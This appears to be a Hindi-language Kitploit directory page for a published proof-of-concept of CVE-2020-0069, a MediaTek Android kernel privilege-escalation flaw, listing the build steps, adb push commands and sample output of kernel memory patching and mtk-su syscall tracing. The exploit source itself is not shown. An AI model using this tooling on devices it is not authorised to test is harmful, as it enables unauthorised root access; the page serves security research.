Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-0069_poc — मीडियाटेक एंड्रॉइड डिवाइसों पर CVE-2020-0069 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो विशेषाधिकार वृद्धि के लिए कर्नेल मेमोरी रीड/राइट और syscall हुकिंग सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/quarkslab/cve-2020-0069_poc
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिशोषणमोबाइल सुरक्षाबाइनरी शोषण
GitHubquarkslab/cve-2020-0069_poc

CVE-2020-0069_poc

मीडियाटेक एंड्रॉइड डिवाइसों पर CVE-2020-0069 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो विशेषाधिकार वृद्धि के लिए कर्नेल मेमोरी रीड/राइट और syscall हुकिंग सक्षम करता है।

रिपॉजिटरी देखें
1092636 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

इस रिपॉजिटरी में वे सामग्रियाँ हैं जिनका उपयोग हमने Xiaomi Redmi 6a (Mediatek SoC MT6762M के साथ) पर CVE-2020-0069 की जाँच करने के लिए किया।

तीन प्रोग्राम हैं:

  • kernel_rw.c एक C प्रोग्राम जो कर्नेल मेमोरी पढ़ने/लिखने की अनुमति देता है
  • poc.sh एक शेल स्क्रिप्ट
  • syscall_hook.c एक C लाइब्रेरी जिसका उपयोग mtk-su प्रोग्राम को ट्रेस करने के लिए किया जा सकता है (संस्करण 19 पर परीक्षण किया गया)

निर्माण

बाइनरी बनाने के लिए:

root@kitploit:~
$ ndk-build

फिर उन्हें डिवाइस पर पुश करें:

root@kitploit:~
$ adb push poc.sh /data/local/tmp
$ adb push libs/armeabi-v7a/kernel_rw /data/local/tmp
$ adb push libs/armeabi-v7a/libsyscall_hook.so /data/local/tmp

उपयोग

CVE-2020-0069 PoC

root@kitploit:~
$ uname -a
Linux localhost 4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
$ sh poc.sh
[+] Found Linux string at 0x4180bc00
[+] Found Linux string at 0x4180bea0
[+] Write the patched value
$ uname -a
minix  4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l

mtk-su को ट्रेस करने के लिए

root@kitploit:~
$ mkdir mtk-su
$ LD_PRELOAD=./syscall_hook.so ./mtk-su
alloc failed
alloc count=400 startPA=0x53df4000
uncatched ioctl 40e07803
exec command (num 0) ( blockSize=8040, readAddress.count=0 ) dumped into cmd-0
exec command (num 1) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-1
exec command (num 2) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-2
[...]
$ cat  mtksu/cmd-1
WFE to_wait=1, wait=1, to_update=1, update=0, event=1da
MOVE 40a68000 into reg 17
READ  address reg 17, data reg b
MOVE startPA+0 into reg 17
WRITE  address reg 17, data reg b
[...]
टूल डाउनलोड करें